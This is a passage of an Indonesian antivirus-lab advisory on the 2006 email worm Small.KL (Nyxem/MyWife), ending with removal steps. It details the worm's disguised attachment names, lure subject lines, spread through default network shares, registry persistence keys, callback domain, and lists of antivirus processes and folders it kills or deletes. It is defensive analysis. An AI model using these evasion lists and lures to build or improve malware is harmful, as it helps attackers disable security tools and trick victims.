mengaktifkan Small.KL dan praktis komputer anda akan dikuasai oleh
Small.KL untuk menjalankan aktivitasnya. Lab Vaksincom juga melakukan
proses scanning dengan Norman Virus Control dan hebatnya lagi, Small.KL
yang menginfeksi komputer Lab Vaksincom berusaha mematikan proses
Scanning Antivirus berulang-ulang.

Disable Antivirus
Small.KL akan berusaha menonaktifkan beberapa program sekuriti dan
Freeware seperti : *DAP (Download Accelerator Pro), program manajemen
download *Bearshare, Peer to Peer Sharing *Morpheus, Peer to Peer
Sharing *Limewire, Peer to Peer Sharing *Symantec Antivirus *Norton
AntiVirus *Avast *McAfee *Trend Micro - PC Cilin 2002 *Trend Micro - PC
Cilin 2003 *Trend Micro - Internet Security *Trend Micro - Office Scan
*Kaspersky Lab *Grisoft - AVG7

virus small KL

Small.KL
akan menghancurkan data MS Office anda pada tanggal 3 Februari 2006

Alias: WORM_GREW.A [Trend Micro], W32/Nyxem-D [Sophos], W32/MyWife.d@MM
[McAfee], Email-Worm.Win32.VB.bi [F-Secure], W32/Small.KI@mm [Norman

SDP SKTB Sesal Dahulu Pendapatan, Sesal Kemudian Tidak Berguna. Pepatah
ini kembali menunjukkan "khasiatnya" sehubungan dengan serangan virus
yang sedang menyebar dengan luarbiasa di seluruh dunia dan tingkat
infeksinya di Indonesia cukup tinggi, dimana menurut laporan yang
diterima Vaksincom korban dari Small.KL ini mencapai ribuan PC yang
terinfeksi, mayoritas adalah komputer yang terhubung ke jaringan baik di
korporat, sekolah maupun Badan Pemerintah.Kalau anda tidak merasa
"terganggu" atau tidak terlalu perduli meskipun jaringan komputer anda
terinfeksi virus dan menyebarkannya ke seluruh alamat email yang
berhasil dikumpulkan oleh virus, paling hanya bandwidth yang hilang atau
memang budaya masa bodo / cuek sudah tertanam dalam pada diri anda.
Vaksincom mengingatkan bahwa sebentar lagi anda akan SKTB (menyesal)
jika anda tidak segera membasmi virus ini dan mengenyahkan dari jaringan
anda karena ia akan melakukan aksinya "menghancurkan" file penting anda
dengan ekstensi *.doc, *.xls, *.mdb, *.mde, *.ppt, *.pps, *.zip, *.rar,
*.pdf dan *.psd pada hari ke tiga setiap bulan. Jadi Small.KL akan
menjalankan aksinya menghapus semua file yang kami sebutkan di atas pada
tanggal 3 Februari 2006, 3 Maret 2006 dst. Karena itu, biasakan diri
untuk secara teratur melakukan Back up atas data penting anda dan simpan
pada media yang terpisah seperti CD rom / USB Drive atau Virtual Drive
di internet seperti Streamload atau Megaupload.

Setelah sekian lama pertempuran dunia maya dimenangkan oleh virus lokal,
kembali jajaran pembuat virus mancanegara [red:non lokal] unjuk gigi hal
ini dibuktikan dengan datangnya tamu tak diundang yang berkunjung dengan
perantara email dengan message body maupun subject yang menggoda
[biasanya berhubungan dengan XXX]

Keberadaan virus ini sudah berhasil di identifikasi sekitar tangal 18
Januari 2006 oleh Norman, tetapi dengan kemampuannya yang dapat menyebar
melalui email menyebabkan virus ini berhasil mengglobal, virus ini juga
tergolong kategori "High Risk" karena penyebarannya yang luar biasa.

Small.KL di buat dengan menggunakan program bahasa "Visual Basic" dan di
kompresi dengan menggunakan UPX dengan ukuran file sebesar 94 KB
[setelah file di extract] atau 131 KB [jika belum di extract]. Jika Anda
mengunakan antivirus Norman Virus Contol, up-date tanggal 18 Januari
2006 sudah dapat mengenali virus ini dengan baik. (lihat gambar 1)
Gambar 1, Norman Virus Control update tanggal 18 Januari 2006 sudah
dapat mengenali W32/Small.KL@mm dengan baik.

Small.KL akan datang dengan membawa lampiran dengan nama ekstensi yang
jarang digunakan oleh beberapa virus lain. Tujuannya adalah untuk
menghindari blocking lampiran yang biasa dilakukan oleh mailserver
terhadap file virus seperti .exe, .com, .zip dst. Adapun ekstensi
lampiran yang digunakan adalah sebagai berikut :
.b64
.BHx
.HQX
.mim
.uu
.UUE
.XxE

Dan jika anda menggunakan Winzip, secara otomatis, file tersebut akan
dapat dibuka dan dijalankan oleh Winzip jika dilakukan klik ganda. Jika
lampiran tersebut dijalankan maka akan muncul satu file dengan ekstensi
tertentu, misalnya .SCR atau .PIF dengan icon WINZIP, file ini akan
mempunyai kurang lebih 38 spasi sebelum ekstensi. Untuk mengelabui user
dengan cerdik Small.KL akan menyembunyikan ekstensi dengan melakukan
perubahan pada registry editor sehingga user tidak dapat membedakan
bahwa sebenarnya file tersebut adalah virus dan bukan sebuah file yang
dikompresi dengan menggunakan WinZIP sehingga jika menjalanan file
tersebut maka secara tidak langsung akan mengaktifkannya dengan
terlebih dahulu akan menampilkan program Winzip kosong,

Setelah file tersebut dijalankan Small.KL akan membuat satu file sesuai
dengan file virus yang dijalankan tadi, file tersebut akan disimpan di
direktori [C:\%windows%\system32].

Contoh : jika file virus yang dijalankan adalah Attachmments,ZIP
[spasi].SCR maka Small.KL akan membuat file di direktori
[C:\%Windows%\System32] dengan nama Lampiran,ZIP [spasi].ZIP

Setelah Small.KL aktif, ia akan mencoba untuk melakukan koneksi ke web
site webstats.web.rcn.net untuk memberitahu "boss"nya IP komputer yang
telah terinfeksi.

Setiap virus akan membuat file induk untuk dijalankan pertama kali,
begitupun dengan Small.KL dimana ia akan membuat beberapa file yang akan
dijalankan, diantaranya:
WINZIP_TMP.exe
C:\
Rundll16.exe [hidden file] dan WINZIP_TMP.exe
C:\Windows scanregw.exe [hidden file], update.exe [hidden file],
winzip.exe [hidden file] dan sample.Zip C:\Windows\System32 Temp.htt
[hidden file], WinZip_Tmp.exe [hidden file] dan desktop.ini [hidden
file]
C:\Document and settings
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Start Menu
C:\Documents and Settings\Administrator\Start Menu\Programs\,
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu
C:\Documents and Settings\All Users\Start Menu\Programs
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

Small.KL juga akan membuat beberapa file [acak] dan "biasanya" file yang
akan dibuat ini akan diambil secara acak sesui dengan nama file atau
folder yang terdapat pada komputer yang terinfeksi, file ini akan dibuat
pada setiap folder yang dishare dikomputer yang terinfeksi virus, file
tersebut mempunyai ciri-ciri
Icon disamarkan [icon Winzip]
Ukuran file 94 KB
Ekstensi EXE
Type file "Application"

Sebagai penunjang agar virus dapat dijalankan setiap kali komputer
dinyalakan Small.KL akan membuat string pada regsitry
ScanRegistry = "scanregw.exe /scan"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

Selain membuat registry diatas Small.KL secara cerdik akan membaut satu
buah file pada menu startup dengan nama file WINZIP QUICK PICK.EXE
sehingga file ini juga akan langsung dijalanakan begitu komputer
dinyalakan, tapi ini dilakukan hanya jika system komputer yang
terinfeksi menggunaakn windows 2000/XP/2003.

Small.KL juga akan mencoba untuk melakukan perubahan pada registry
berikut
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet
Explorer\Main\NotifyDownloadComplete="7562617"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet
Settings\ZoneMap\UNCAsIntranet="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet
Settings\ZoneMap\ProxyBypass="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet
Settings\ZoneMap\IntranetName="1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntversion\Explorer\Adv
anced\WebView="0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntversion\Explorer\Adv
anced\ShowSuperHidden="0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Cab
inetState\FullPath="0"
HKEY_LOCAL_MACHINE\ SOFTWARE\ Classes\ License
Hal ini dimaksudkan untuk disable automatic update pada Windows XP
Service Pack 2

Menyebar melalui Network Share dan Email

Untuk menyebarkan dirinya virus membutuhkan media yang dapat digunakan,
kali ini Small.KL akan menggunakan beberapa media penyebaran yang
dianggap mudah dan sering digunakan oleh user diantaranya menyebar
malalui network share dimana Small.KL akan berusaha untuk copy file ke
dalam komputer dengan default share diaktifkan yaitu,
Admin$
WINZIP_TMP.exe
C$
WINZIP_TMP.exe
C$\Documents and Settings\All Users\Start Menu\Programs\Startup
WinZip Quick Pick.exe
Selain dapat menyebar melalui jaringan dengan memanfaatkan Default
Share, Small.KL juga akan menyebar melalui email dengan terlebih dahulu
akan memcoba untuk mengambil alamat email dari setiap file yang
mempunyai ekstensi
.htm
.dbx
.eml
.msg
.oft
.nws
.vcf
.mbx
.imh
.txt
.msf
.dmp
.CONTENT.
TEMPORARY
Setiap email yang dikirimkan akan mempunyai ciri-ciri dibawah ini
From
Subject
Re: Sex Video
Re:
Fw: Picturs
Fw: Funny :)
Fwd: Photo
Fwd: image.jpg
Fw: Sexy
Fw:
Fw: SeX.mpg
Fwd: Crazy illegal Sex!
Fw: DSC-00465.jpg
eBook.pdf
Hello
Fw: Real show
the file
Word file
*Hot Movie*
A Great Video
Fw: Picturs
give me a kiss
Miss Lebanon 2006
My photos
Part 1 of 6 Video clipe
Photos
School girl fantasies gone bad
-Message
->> forwarded message
-forwarded message attached
-****in Kama Sutra pics
-hello
-Helloi attached the details
-Hot XXX Yahoo Groups
-how are you?
-i just any one see my photos
-i send the details
-i send the file
-It's Free :)
-Note: forwarded message attached. You Must View This Videoclip!
-Please see the file.
-Re: Sex Video
-ready to be ****ED ;)
-Thank you
-The Best Videoclip Ever
-the file i send the details
-VIDEOS! FREE! (US$ 0,00)
-What?

Dari message tersebut terdapat kurang lebih 3 [tiga] buah gambar kosong
[tidak terdapat gambar] dengan nama
-DSC-00465.jpg, DSC-00466.jpg dan DSC-00467.jpg
Atau
-Photo, photo2 dan photo3
-Lampiran007.pif,
-392315089702606E-02,.scR,
-677.pif,
-Adults_9,zip.sCR ,
-ATT01.zip.sCR
-Lampirans[001],B64.sCr
-Clipe,zip.sCr
-document.pif
-DSC-00465.Pif
-DSC-00465.pIf
-eBook.PIF
-image04.pif
-New Video,zip
-New_Document_file.pif
-photo.pif
-Photos,zip.sCR
-School.pif
-SeX,zip.scR
-Sex.mim
-Video_part.mim
-WinZip,zip.scR
-WinZip.BHX
-WinZip.zip.sCR
-Word XP.zip.sCR
-Word.zip.sCR

Tetapi, Small.KL akan mencoba untuk tidak mengirimkan dirinya ke alamat
email yang mengandung string
@YAHOOGROUPS
BLOCKSENDER
SCRIBE
YAHOOGROUPS
TREND
PANDA
SECUR
SPAM
ANTI
CILLIN
CA.COM
AVG
GROUPS.MSN
NOMAIL.YAHOO.COM
EEYE
MICROSOFT
HOTMAIL
MSN
MYWAY
Melumpuhkan Program Sekuriti

Agar Small.KL dapat menjalankan misinya ia akan menghapus beberapa
string value pada registy, hal ini dimaksudkan agar file tersebut tidak
dijalankan
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run

- PCCIOMON.exe
- pccguide.exe
- Pop3trap.exe
- PccPfw
- Tmproxy
- McAfeeVirusScanService
- NAV Agent
- PCCClient.exe
- SSDPSRV
- rtvscn95
- defwatch
- vptray
- ScanInicio
- APVXDWIN
- KAVPersonal50
-TM Outbreak Agent
- AVG7_Run
- AVG_CC
- Avgserv9.exe
- AVGW
- AVG7_CC
- AVG7_EMC
- Vet Alert
- VetTray
- OfficeScanNT Monitor
- avast!
- DownloadAccelerator
- BearShare
- Kaspersky

Selain itu Small.KL juga akan mencoba untuk menghapus file dengan
ekstensi .EXE dan .DLL pada program antivirus hal ini dimaksudkan agar
antivirus tersebut tidak dapat berfungsi dengan baik, seperti :
%Program Files%\Alwil Software\Avast4
%Program Files%\BearShare
%Program Files%\DAP
%Program Files%\Grisoft\AVG7
%Program Files%\Kaspersky Lab\Kaspersky Anti-Virus Personal
%Program Files%\McAfee.com\Agent
%Program Files%\McAfee.com\shared
%Program Files%\McAfee.com\VSO
%Program Files%\Morpheus
%Program Files%\NavNT
%Program Files%\Norton AntiVirus
%Program Files%\Symantec\Common Files\Symantec Shared
%Program Files%\Symantec\LiveUpdate
%Program Files%\Trend Micro\Internet Security
%Program Files%\Trend Micro\OfficeScan
%Program Files%\Trend Micro\OfficeScan Client
%Program Files%\Trend Micro\PC-cillin 2002
%Program Files%\Trend Micro\PC-cillin 2003
Disamping itu Small.KL juga akan menghapus file pada komputer yang
terhubung ke jaringan dengan memanfaatkan Default Share Windows
\C$\Program Files\Norton AntiVirus
\C$\Program Files\Common Files\symantec shared
\C$\Program Files\Symantec\LiveUpdate
\C$\Program Files\McAfee.com\VSO
\C$\Program Files\McAfee.com\Agent
\C$\Program Files\McAfee.com\shared
\C$\Program Files\Trend Micro\PC-cillin 2002
\C$\Program Files\Trend Micro\PC-cillin 2003
\C$\Program Files\Trend Micro\Internet Security
\C$\Program Files\NavNT
\C$\Program Files\Panda Software\Panda Antivirus Platinum
\C$\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal
\C$\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro
\C$\Program Files\Panda Software\Panda Antivirus 6.0
\C$\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus

Tidak hanya itu saja Small.KL juga akan mencoba untuk
mematikan/terminate suatu program yang mempunyai string :
FIX
KASPERSKY
MCAFEE
NORTON
REMOVAL
SCAN
SYMANTEC
TREND MICRO
VIRUS

Jika Anda menggunakan antivirus Norman Virus Control, walaupun Small.KL
mencoba untuk mematikan proses dari antivirus tersebut tetapi gagal
sehingga n antivirus Norman Virus Control tetap dapat digunakan.
Small.KL berusaha untuk mematikan antivirus Norman Virus Control

Sebagai tambahan Small.KL juga akan mencoba untuk disable "keyboard" dan
"mouse" sehingga kedua device tersebut tidak dapat digunakan selain itu
jika anda mencoba untuk membuat email baru [New Message] Small.KL akan
langsung menutup lembar pesan/email terbebut sehingga anda akan
kesulitan untuk mengirimkan email, untuk program Outlooks express itu
sendiri masih dapat digunakan [tidak di matikan], pada saat Small.KL
akan menutup lembar email yang akan dibuat ia akan menampilkan pesan
berikut: (Gambar 7)

Overwite File

Setiap hari ke 3 pada tiap bulannya, kurang lebih setelah 30 menit
virus tersebut aktif , ia akan mencoba untuk menulis ulang semua file
yang mempunyai ext. Dibawah ini dengan menambahkan text DATA Error [47
0F 94 93 F4 K5]":

DOC
XLS
MDB
MDE
PPT
PPS
ZIP
RAR
PDF
PSD
DMP

Smal.ki juga akan menambahkan icon di stray menu dengan menampilkan
pesan "Update Please wait" icon ini muncul jika menggunakan antivirus :
Norton Antivirus
Kaspersky Lab
Panda Software
Cara membersihkan W32/Small.KI :
1. Disconnect komputer dari jaringan [sebaiknya lakukan pembesrihan
memalui mode safe mode"
2. Jika menggunakan windows ME/XP, matikan [system restore] selama
proses pembersihan
3. Matikan proses dari virus tersebut anda dapat menggunakan Task
manager, matikan 2 proses dari virus tersebut yaitu
a.update.exe
b.winzip.exe
4. Hapus regsitry key yang diubah oleh virus

a. ScanRegistry = "scanregw.exe /scan"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run b.
Ubah string ShowSuperHidden dengan value 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntversion\Explorer\Adv
anced c. Ubah string WebView dengan value 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntversion\Explorer\Adv
anced d. Ubah string FullPatch dengan value 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Cab
inetState e. Ubah string UNCAsIntranet dengan value 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\InternetSett
ings\ZoneMap

5. Hapus File yang dibuat oleh virus WINZIP_TMP.exe C:\Rundll16.exe
[hidden file] dan WINZIP_TMP.exe C:\Windows scanregw.exe [hidden
file],
update.exe [hidden file], winzip.exe [hidden file] dan sample.Zip
C:\Windows\System32 Temp.htt [hidden file] dan WinZip_Tmp.exe
[hidden file] C:\Document and settings
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Start Menu
C:\Documents and Settings\Administrator\Start Menu\Programs\,
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu
C:\Documents and Settings\All Users\Start Menu\Programs
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

6. Hapus juga file yang dibuat pada setiap folder yang dishare dengan
ciri-ciri o - Icon disamarkan [icon Winzip]
- Ukuran file 94 KB
- Ekstensi EXE
- Type file "Application"

7. Untuk pembersihan lebih optimal gunakan antivirus dengan up-date
terbaru
8. Sangat disarankan untuk menginstall "antivirus for mail server"
[jika Anda
mempunyai mail server] atau menginstall antivirus yang mempunyai
kemampuan untuk scanning email sebelum email tersebut dikirim atau
diterima dan jangan sembarangan dalam membuka lampiran yang telah
disebutkan diatas. (AJT)